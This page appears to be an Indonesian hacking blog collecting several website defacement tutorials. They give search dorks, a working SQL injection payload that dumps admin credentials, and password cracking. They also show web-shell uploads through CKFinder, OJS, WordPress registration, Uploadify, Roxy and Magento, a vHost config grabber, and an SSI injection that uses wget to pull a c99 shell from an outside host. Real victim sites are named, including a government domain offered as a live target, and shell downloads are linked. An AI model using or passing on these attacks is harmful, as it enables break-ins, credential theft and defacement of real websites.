Showing posts with label Deface. Show all posts
Showing posts with label Deface. Show all posts

Tuesday, 1 January 2019

Tutorial Deface dengan cara Sql Lokomedia Terbaru 2019

Oh iya ane mau share cara deface lg nih , tapi dengan cara yg berbeda :v , kali ini ane share cara deface dengan cara SQL LOKOMEDIA :v
Oh iya sebelom ane ksih tau tutornya , ane mau nanya neh :v , Klean smua malem jumat ini ngapain aja >:( , jangan jangan ........... ahh sudahlah lupakan :v ... Yuk disimak caranya :V

Bahan Bahan :

#Dork : inurl:/statis-1-profil.html
             inurl:/statis-2-profil.html
             inurl:/statis-3-profil.html [ Kembangin lagi dorknya biar dpet web yg vuln, oh iya ane ksih tau nih klo mau kembangin dork ini tinggal ubah aja ANGKA nya ]

#Bagi yg blom pnya shell format .phtml bisa di download disini ~> https://uploadfiles.io/72upn
  password shellnya : akugans

#Exploit :

'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

#Admin finder online/admin finder tools jg boleh :v

#oh ea , saran ane sih sambil dengerin musik Marshmello :v


Caranya :

1. seperti biasanya kita buka google trus masukin dork yg diatas , trus pilih salah satu websitenya tapi cari yg ada halaman statisnya :v, lihat gambar :v



2. nah ane udh dapet targetnya nih, kan di url target tertulis
http://sewakursimejamurah.com/statis-1-profil.html
ada statis-1-profil.html kan? nih liat gambar



3. nah pas sesudah angka sisipkan exploitnya maka akan jadi seperti ini
 http://sewakursimejamurah.com/statis-1'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
[ sesudah di sisipkan exploitnya skrg tekan enter, dan liat di tab atas tertulis [ ,admin,06c43bd.....] nah klo di atas tab muncul begitu brrti username sma password udh ketebak :v, untuk melihat username dan passwordnya sekarang klo untuk di Pc/komputer/Laptop pencet Ctrl+U mungkin klo di hp bisa tambahin doang [ view-source: ] di awal url linknya :v, liat gambar :v




4. kan udh ente ctrl+u tuh , nah sekarang liat disitu tertulis admin,09....... nah itu dia username sma passwordnya, OH IYA ITU BUKAN PASSWORD ASLINYA , TAPI KITA HARUS HASH PASSWORDNYA DLU BIAR BISA DAPAT PASSWORD ASLINYA



5. ok kita kan udh tau nih ya kan username sama passwordnya yg msih dalam bentuk Md5 sekarang kita Copy passwordnya itu yg di samping kanan tulisan admin, nah copy angkanya saatnya kita hash online passwordnya di https://hashkiller.co.uk/md5-decrypter.aspx  ,,, nah dan jreng jreng ane udh berhasil nih gan dapet password aslinya :v,Untuk liat password aslinya nnti akan muncul di sebelah kanan, nih liat gambar



6. nah kan udh dapet password aslinya tuh, sekarang kita cari dimana admin loginnya, bisa pke adminfinder online, bisa juga pke admin finder tools :v, bisa juga pke cara manual nih ane ajarin , caranya

*misalkan web ini : http://sewakursimejamurah.com
*Kita tambahkan /robots.txt di akhir urlnya maka akan jadi gini http://sewakursimejamurah.com/robots.txt
nah pas kita tambahkan /robots.txt maka akan muncul tulisan
User-agent: *
Disallow: /adminw36
[ Nah kita liat deh tuh yg tulisan disallow nya, karna itu disallownya /adminw36 berarti halaman admin login ada di http://sewakursimejamurah.com/adminw36 ] , paham kan? liat gambar :v



7. sekarang kita coba login dengan username sama password yg udh kita hash tadi , halaman admin login ada disini http://sewakursimejamurah.com/adminw36 klo udh berhasil msk maka tampilan nya akan seperti ini



8. Daaaaan Boom!!! kita udh berhasil masuk sebagai admin di web sewakursimejamurah.com wkwkwk :v, oh iya cara tanem shellnya gomna? iya kalem ane jelasin :v
OK , dimana tempat buat tanem shellnya? lihat tulisan [ Media Trus Pilih Download ] kan? nah disitu kita tanem shellnya , lihat gambar :v



9. Nah itu udh ada file nya :v, itu juga shell ane :v , udh ane tanem :v jadi ane gausah tanem lg ea :v , skrg kita klik tulisan [ Tambah Download ] , Nah trus pilih deh shell lu , tampilannya kya gini :v



10. INGET BRO BACA BAIK BAIK : upload shellnya harus format .phtml
      jadi yg blom punya udh ane sediain tuh diatas link buat download shellnya :v


11. ok klo shell udh berhasil ke upload sekarang kita cari akses shellnya/ bisa dibilang dimana shell lu berada caranya? ok gini caranya kita cukup tambahkan /files/namashelllu  . jadi kaya gini http://sewakursimejamurah.com/files/shell.phtml [ Nah yg Shell.phtml itu lu ubah aja sesuaikan dengan nama shell yg udh lu upload tadi gan :v ... nah dan jreng jreng ane udh ketemu nih akses shellnya lihat gambar :v



hehe terserah deh mau diapain :v , Tebas index jg gapapa :v
TAPI INGAT klo mau tebas index , diusahakan di backup indexnya kasihan adminnya bikin script indexnya lag :'(
Kalo mau jadi bajingan jadi sekalian jangan tanggung tanggung , tapi kalo mau jadi bajingan tapi ragu-ragu mending jangan

h3h3 udh itu aja ya :v, ok cukup sekian tutor dari ane, ane akan share share cara deface yg lainnya , see you next time guys :v

Oh iya klo ada link atau gambar yg ga muncul atau ada yg ga ngerti bisa langsung kontak ane

Monday, 31 December 2018

Tutorial Deface dengan cara Wp Add Admin


Setelah sekian lama share berita berita trus, Kini saatnya Share cara deface Wp Add Admin

Kita memanfaatkan pada form loginnya, ok langsung aja ya bahan bahannya dan caranya

Bahan Bahan :

1. Dork : inurl:/wp-login.php?action=register site:in [ Site bisa diganti sesuai keinginan ]

2. Email yang aktif , karna email kita digunain untuk mengaktifkan user &  password yg kita daftarkan

3. File zip yang digunakan untuk upload shell saat nanti udh selesai register, bagi yg blm punya file zipnya kalian bisa download disini ~> Klik Disini!! , Kalo link pertama rusak/gabisa kalian bisa download disini ~> Link Download ke 2
Isi dari file zip tersebut
- shellmini
- shellbesar
- shellxai dll nya

4. wajah yg ganteng >:( , kalo gk gans ya gabisa pekok >:( awokakoaowk canda :v


Caranya guys :*

1. Hal 1 seperti biasa gan klean dorking dlu menggunakan dork diatas ke mesin pencarian Google awokawok :v

2. Kalo udh dorking nah , pilih salah satu website yg tampilannya sperti ini atau yg tampilannya di bawahnya ada form register , ini contohnya


Liat yg dilingkari kan? nah itu dia form registrasinya

3. Slnjutnya kita klik registrasi , dan masukkan email yg aktif beserta username terserah kalian klo usernamenya , contoh kya gini


4. Nah klo udh registrasi , kalian cek email kalian, nnti di email klean ada link aktivasi buat membuat passwordnya

5. Kalo klean udh selesai registrasi , nah login dengan username dan password yg klean buat tadi... Jika berhasil login. kita masuk sebagai admin. contoh lihat gambar


6. Nah kita udh msuk sebagai admin nih, Lalu gimana caranya upload shell? Gimana? Iya kalem w kasih tau caranya
Ok di dashboard admin, kalian cari tulisan [ Plugin ] *Tanpa tnda kurung
Lihat gambar



7. Nah selanjutnya kalian upload file yg format zip tadi , uploadnya di plugin ea :v
Kalo upload nya berhasil maka akan kya gini tampilannya


Pokoknya klo upload brhsil , ada tulisan [ akrivate plugins ]

8. Nah kan file udh ketanem, selanjutnya kita mencari akses shellnya, gimana nyarinya? iya gimana ea?
Ok gini caranya kalian tinggal tambahkan contoh
www.site.com/wp-content/plugins/namafilelu/jenisshellnya
Contoh kya gini liat gambar


9. Nah itu dia contoh nyari akses shellnya... Btw shell w udh ke upload ea :v, wkwkwk nah klo akses shell udh ketemu trus mau diapain tuh? wkwkwk silahkan tebas index... tapi saran sih kalo tebas index backup indexnya gan
Hargain webmaster dari website tersebut gan :v pakai Ethica Hacking lo :v

dah ya tutorialnya cukup smpe disini aja ya...
Ok sekian. see you next time guys :*

Tutorial Deface Dengan Cara CKFinder

Oh ea sbenernya oe masih ngantuk neh :v , Semalem oe bobo jam 2 pagi :( , Tapi oe pagi pagi gini mau tebar ilmunya neh :v yaituuuuuuu :v
DEFACE DENGAN CARA CKFINDER
Jreng boom :v , Mungkin sebagian udh tau deface dengan cara ini , tapi apa salahnya kita untuk mencoba lagi trus mencoba trus mencoba dan mencoba :v dan mengasih tau bagi yg blm tau :v
Kebetulan deface dengan cara ini msih banyak web yg vulnerability mungkin ada disekita 20++ web yg vuln cara ini , GOOGLE pun juga bisa di deface pke cara ini :v , awokaokaowkk dasar heker jaman now :v ... Langsung aja ya bahan dan cara caranya :v

Bahan Bahan :

# Dork : inurl:/CKfinder/CKfinder.html site:com [ Site bebas mau apa aja bisa .com .org .in go.id .gov pokoknya bebas ]

#Kali ini kita hanya membutuhkan sebuah teks, tulisan [ Pke script deface juga bisa sih tapi jarang , kebanyakan hanya teks doang ] ,, krna deface ini hnya pke teks sama gambar doang mungkin bagi yg blm punya teksnya bisa di download disini teks nya >> https://ufile.io/v0rpj

#Koneksi Internet yang kenceng ea :*


Langsung aja caranya disni :

1. Seperti biasanya kita buka mesin pencarian senior kita yaitu https://google.com Ok kalo udh search di google sekarang pilih salah satu webnya, lihat gambar




2. nah sekarang buka web yg klean pilih , penampakannya akan seperti ini lihat gambar



3. selanjutnya kita upload text yg kalian download diatas tdi, udh ane kasih kan? nah iya sekarang upload textnya , klo udh ke upload akan muncul text kalian yg tadi , seperti ini lihat gambar :v text yg ane upload nmanya anonymous tuh lihat gmbar :v


4. karena itu ane udh coba upload dalam format teks , sekarang ane mau coba upload dalam bentuk gambar, klo kalian mau upload sebuah gambar bisa klik di folder [ Images ] nah trus nanti klik upload, boom ane udh berhasil upload gambarnya yg namanya palestina.jpg itu gambar ane :v ,lihat gambar :v



5. Nah file teks sma file gambar udh ke upload sekarang kita klik kanan pada file/gambar yg udh kalian upload tadi , lalu pilih view dan jreng jreng jreng ini dia hasil gambar yg udh ane upload tadi :v



6. OH IYA bagi kalian yg upload gambar trus susah cara cari gambarnya atau cara buka gambarnya seperti diatas , nih ane kasih patch nya aja tinggal tambahin nama gambar lu di akhir url nih patchnya

http://birodikmental.jakarta.go.id/extra/ckfinder/core/connector/php/media/ckfinder/images/palestina.jpg   [ YANG PALESTINA.jpg Ganti dengan nama gambar yg udh lu upload tadi ] Ngerti kan? Klo ga ngerti chat oe aja :v


7.Oh iya udh pada ngerti kan? pasti dong ya lach kan udh pro >:(
 yaudh oh iya tuh ane kasih live target juga buat bahan percobaan bagi yg pemula hehehe :v
ok ane pamit ea fans :* :*

oh ea klo ada yg ga ngerti langsung chat ane aja di ? Dimana ? Dimana aja :v

ok sekian dolo ea tutor defacenya nanti ane balik lagi , ngasih tutor tutor yg lebih zeeb :v ok sekian

Tutorial Deface Dengan Cara Register Member


Hoaaam ane ngantuk gan :( ,,, tapi ane keinget ada 1 tutor lagi yg masih banyak yg vulnerability , ya jadi apa salahnya ane tulis disini berbagi ilmu itu indah, jadi jangan merasa pling tinggi trus lupa sma yg dibawah h3h3,,
Jadi gini cuy w mau kasih tau neh tutor deface dengan cara REGISTER MEMBER nah napa kaget y asu? >:( sp yg kaget sene? w sleding satu satu h3h3 :v
Nah kebetulan deface pke dengan teknik ini hampir sama dengan teknik deface Ojs sama sama register cuman bedanya gk susah cari akses shellnya. udah ah langsung ae ye? ok gass ngeng ngeng :V


Bahan Bahan :
#Dork : inurl:media.php?module=daftar
             inurl:/register.html intext:"Share this article"
            [ Kembangin lagi dorknya ]

#Shell backdoor/ Script deface 
   Shell format .php5 download disini > https://uploadfiles.io/ervxh password shell : akugans
   Shell format .phtml download disni > https://uploadfiles.io/72upn password shell : akugans

#Inget wajah yang ganteng , sama apalagi ea?? Oh iya inget hrus ada koneksi internet , jangan bilang selama ini klean ngerjain ini gk pke koneksi internet >:( , udah ah oe ngantuk langsung aja ya caranya


Langsuk disimak caranya dibawah ini , cekidot :*

1. Hal 1 yg harus klean lakukan adalah buka gugel/gogel/google/ggoollee/apalah pokoknya :v, ya buka gugel trus search menggunakan dork diatas, nah pilih salah satu website nya bukan salah satu video b*kepnya :(

2. jika klean udh memilih salah satu website, selanjutnya klean Register Sebagai Member dlu di website yg klean pilih, Nih ane aja register masa kamuu ngga? :(



3. Kalo udh selesai register , kadang tempat buat upload shell ada di dalem kadang di luar , klo sperti gmbr yg di atas itu tmpt upload shellnya ada diluar , ok selesai register silahkan login , nih ane aja mau login masa kamu yg cantik gk login :*




4. Nah klo udh berhasil masuk sebagai member saatnya klean berjoged dolo goyang goyang asique jungkirbalik kalo perlu :v, dah ah asu jadi alay gini >:(..... Ok next jika klean udh masuk sebagai member sekarang saatnya cari tempat [EDIT PROFIL] mungkin beda web beda nmanya juga kli ya :v, yah pokoknya tmpt buat edit data data lu sma edit foto profil lu sebagai member kayak gini



5. Oh iya , Karena tadi ane tempat buat upload shell/upload script ada di form register jadi di dalam gk ada tmpt upload shell karena kan tdi udh diluar, mungkin beda website beda juga jenisnya :v
Oh iya inget upload shellnya harus ber extensi shell.phtml sama shell.php5 klo yg blm ada shell bisa di download dii atas udh ane sediain :v


6. Nah kalo klean sudah upload shell kalian di tempat foto profil kalean langsung aja klik kanan terus pilih [Open Image In New Tab] klo berhasil pasti bakal muncul shellnya, klo gk berhasil ya gk muncul shellnya, eh iya gan kebetulan ane berhasil neh upload shellnya dan jreng jreng door door




7. Nah klo udh berhasil upload shell klean mao apa? krik krik krik awokaowkaokwakw :v
Oh ea klo mau tebas indexnya gw saranin backup indexnya coy kasihan adminwebnya nanti :v. ok guuuud :v
Jadi gini gan saia udh ngantuk ini :( , sekarang malming ea gan ? walaaach :(
udah ea saia pamit sekian dolo tutorial dari ane kali ini , klo ada yg kurang ngerti bisa langsung contact oe ok ea ane pamit
Wassalamualaikum Wr Wb :* :)


Sunday, 30 December 2018

Tutorial Deface Dengan Cara OJS

Jadi gini, aku mau share tutor Deface OJS ne cooy :vOk langsung aja ya cara and bahan bahannya :v

Bahan Bahan :
# Dork : inurl:index.php/index/user/register site:ac.id
# Ojs Shell Finder / Klo Mau pke cara manual juga bisa :v
# Shell backdoor / script deface
# wajah yg gans
# aer putih + sianida + baygon + soffel h3h3 :v


langsung aja ya disimak caranya di bawah ini cekidot :v

1. cari target menggunakan dork diatas, pilih salah satu web yg ingin di di deface :v

2. jika sudah memilih webnya, sebelomnya kita cek dlu vuln atau kaga itu webnya :v , caranya? ok caranya kita cukup tambahkan /files di akhir url web target :v. misalkan :
www.site.com/files [ kalo muncul index of atau forbidden kita masih ada kesempatan ] klo notfound yah mungkin kurang ganteng :v wkwkwk :v ok next >:(

3. sesudah kita cek vuln ape kga itu website nah sekarang kita coba register seperti gambar berikut

 

Pas dimenu register , jangan centang yg tulisan Send a verification email with username and password.
Tapi ceklis tulisan yang  : Prepared texts can be submitted
liat gambar klo kurang ngerti



4. nah klo udh regitser silahkan login dengan username sma password yg baru di daftar tadi gan :v, nah zeeb

5. nah ini oe udh login , sekarang klik [ New Submission ] , Centang semua trus klik save and continue , lihat gambar klo kurang ngerti :v



6. abis klik save and continue, trus upload shell mu gan :v, di kolom bawah ada tempat buat upload shell tuh :v, INGAT! extensi shell harus format .phtml  contoh : shell.phtml nah jadi ubah dlu ya format shellnya hehe :v, nah klo udah berhasil upload shell nanti akan muncul bisa dibilang nomor kebruntungan bisa dibilang nomor shell lu :v , harus di ingetin tuh nomor shell lu biar gk lupa mending di ss aja nomor shellnya, itu gunanya buat cari dimana shell lu berada gan :v , lihat gambar



7. nah itu nomor shell ane, klo nomor shell lu yaa beda laah coeg ga sama wkwkw :v ,, selanjutnya kita cari akses shellnya dengan menggunakan Ojs Shell Finder Dari N45HT neh gan sekalian promosi team ane wkwk nih linknya http://blog.n45ht.web.id/2017/06/ojs-shell-finder.html tuh cara cari akses shellnya , eh iya jangan lupa Like fanspage kami ya di facebook cari aja N45HT hehe ok lanjut ahh wkwkwk

8. nah kan udh tau caranya tuh cari cara akses shellnya pke xampp ketik di cmd
cd c:/xampp/php
c:/xampp/php>php ojs.php url target nama shell lu bla bla bla selebih tutornya ada di atas udh oe kasih hehe

9. nah jreng jreng oe udh berhasil nemuin akses shellnya nih, terserah deh mau diapain tuh web mau di tebas semua index.php juga silahkan tapi INGAT!!! [ Klo mau tebas indexnya hrus di backup dolo , kasihan webadmin nya nnti , apalagi itu web indonesia web kuliah domainnya aja ac.id jadi jgn lupa di backup yaa kids kids jaman now :v ] , lihat gambar akses shell oe dh ketemu


Oke sekian dolo tutor deface ojs nya dari oe , nanti oe balik lagi buat share tutor deface laennya, hehehe

Saturday, 29 December 2018

Tutorial Deface dengan teknik Magento Priv8

Tutorial Deface dengan teknik Magento Priv8

Bahan bahan
1. Dork "inurl:/customer/account/login/referer/"

2. Download SQLI dork scanner di gogel

3. Exploiter bisa cari di gogel

4. Jgn lupa chiki cheetos yg rasa jagung ea😂

Oke langsung aja tutorialnya nih

1. Buka sqli dork scanner yg udh di download di gogel tdi. Jika blm download dlu ea

2. Klik remove clones

3. Copy All web , lalu paste di Exploiter, jangan lupa mengisi username dan password

4. Klik scan sampai "Succes"

5. Lalu buka admin pagenya contoh
site.c0.li/admin
site.c0.li/index.php/admin

6. Login dengan username dan password yg kalian isi di exploiter tadi

7. Select 'System' klik 'Configuration'

8. Klik 'Design' di sidebar kiri

9. Setelah masuk ke 'Design' pilih 'HTML Head'

10. Isi 'Miscellaneous Scripts' dengan Script Deface kalian.. jika sudah lalu klik "Save Config"

11. Jika berhasil maka akan muncul tulisan seperti ini "The Configuration Has been saved

12. Okay well done berhasil... silahkan cek website lu bro

Okey sekian tutorial deface dari gw...ingat!
Segala kerusakan diluar tanggung jawab kami😊

Tuesday, 25 December 2018

Tutorial Deface Dengan Cara Uploadify


Hai guys senang bertemu dengan kalian :v

Udh lama nih gw gk share tutor deface wkwkwk :v , Iya gan sorry lagi sibuk wkwkw :v
Nah sekarang gw mau share tutor deface nih langsung aja yuk disimak

Deface Dengan Cara Uploadify

Dork : inurl:/uploadify/ intitle:index of site:br ( kembangin lagi biar dapet yang vuln wkwk )

Csrf Online >> Klik Disini !!! , Kalau link rusak bisa di link kedua >> Klik Disini !!!

Ok caranya gan disimak ya



1. Lu dorking di google menggunakan dork diatas , lihat gambar



2. Trus pilih salah satu websitenya
    Ciri Ciri kalau website nya vuln, lihat gambar



3. Lalu buka CSRF online nya yg diatas udh gw kasih, trus paste linknya di csrf nya pilih Filedata trus klik LOCK
Lihat gambar



4. Kalo udh klik LOCK , sekarang upload shellnya
Extensi apa bosq? ext nya bebas bosq apa aja , lihat gambar



6. Klik hajar, nah kalo pas kita klik hajar muncul tulisan ini berarti shell udh berhasil ke upload, lihat gambar



7. nah klo shell udh berhasil ke upload kya gitu akan muncul nama shell yg tdi kita uplaod, sekarang tinggal akses shellnya,,, akses shell?? contoh >> site.com/shell.php




Nah kan shellnya udh berhasil ketanem, sekarang bebas deh mau diapakan shellnya, tebas index juga boleh wkwkwk :v
Oke guys sekian dolo nih tutorial defacenya wkwk :v,karna udh malam :v
Thanks buat chrs yang udh kasih live targetnya wkwkwk :v

See You Next Time :*

Tutorial bypass vHost Config Grabber


Ok guys perkenalkan gw ddy , umur? private gan , intinya w masih pelajar hwhw :v

Ok langsung aja gw disini mau kasih tau Cara Bypass Vhost Di Website

Mungkin bagi kalian yg suka deface pernah kan dapat shell yg ada ada Vhostnya? Namun pas di kliK
Can't Open Directory

Oke langsung aja caranya

# Download dlu file untuk bypass Vhostnya disini >> Download !!!
   Klo link download 1 rusak , bisa klik link ke 2 >> Download !!!

# Lu hrus pnya shell yg ada vhostnya contoh >> /var/www/vhost/site.com/

Caranya

1. Buka shell lu yg ada tulisan ini di atas shell lu , liat gambar



2. klo di shell lu ada tulisan begitu, upload file bypass vhostnya



3. trus buka file yg tdi kita upload, maka akan kya gini tampilannya



4. next aja trus smpe akhir nya kya gini


klo udh di klik , sesudah di klik akan muncul config dari masing masing website yg kita bypass vhostnya



trus buka confignya, masuk lewat adminer, edit user & pw lewat adminer



oke terima kasih untuk  Con7ext & Xai Syndicate  yang udah share tutornya

Ok sekian dari saya....

Tuturial Deface Dengan Cara Roxy File Manager


yoo wassap masih disini dengan orang yang sama seperti biasa selalu gans setiap saat wkwkwk :v

Ya kali ini gw disini share TUTORIAL DEFACE DENGAN CARA ROXY FILE MANAGER


Langsung aja disimak tutorial nya

Dork : inurl:/js/fileman/

           inurl:/js/

Shell yang ber extensi : [ .php ] [ .php.xxxjpg ] [ .php5 ] dll nya



Caranya


1. Lu dorking ke google menggunakan dork di atas udh gw sediain, lalu pilih salah satu web, lihat gambar




2. klo udh cari web yang ada tempat upload nya contoh kayak gini



3. nah skrg upload shell / backdoor lu di bagian mana aja bebas, ext shellnya di atas udh gw kasih tau
klo udh berhasil ke upload kayak gini



4. sekarang tinggal akses shellnya, dimana?
contoh > site.com/js/fileman/Uploads/tempatdimanaluuploadfilenya/namashell.php

jadi kaya gini, lihat gambar akses shellnya


Oke sekian guys , See you next time :*

Tutorial Deface Dengan Cara Server Side Include Injection (SSI Injection)

Dan hari ini gw ingin share POC Deface Dengan Cara Server Side Include Injection (SSI Injection)

Lalu apa itu SSI Injection
Gw jelasin sedikit apa itu SSI Injection

Server Side Includes (SSI) adalah bahasa server untuk halaman web, yang dirancang untuk membuat halaman HTML statis sedikit lebih dinamis.
SSI bermaksud membuat halaman HTML mirip dengan aplikasi dinamis, seperti yang ditulis dalam ASP, PHP dan bahasa yang serupa dan memungkinkan penyertaan server informasi dinamis di halaman HTML. Halaman HTML dengan tag SSI biasanya memiliki ekstensi shtml atau shtm.

Penggunaan SSI yang paling umum adalah termasuk konten file ke dalam halaman web dari server web.


DORK

inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=


Gw menemukan halaman ini dan memasukkan nama pengguna gw sebagai Sylar:




Kita dapat melihat pada gambar di atas bahwa nama pengguna yang kita masukkan telah ditampilkan di layar setelah kami mengirim data dan halaman dengan ekstensi shtml, jadi menurut lo apa yang akan terjadi jika gw memasukkan nama pengguna gw sebagai:

<!--#echo var="HTTP_USER_AGENT" -->

Lalu akan muncul ini




Sekarang gw akan mencoba memasukkan kode berikut sebagai nama pengguna:

<!--#exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" -->

Kalau berhasil akan muncul seprti ini


The command executed successfully
Sekarang kita lihat shell kita
akses shellnya? site.com/shell.php


Ok cukup mudah bukan? XD

Ok guys cukup sekian, soalnya admin mau lebaran dulu sama teman teman, keluarga dll nya :)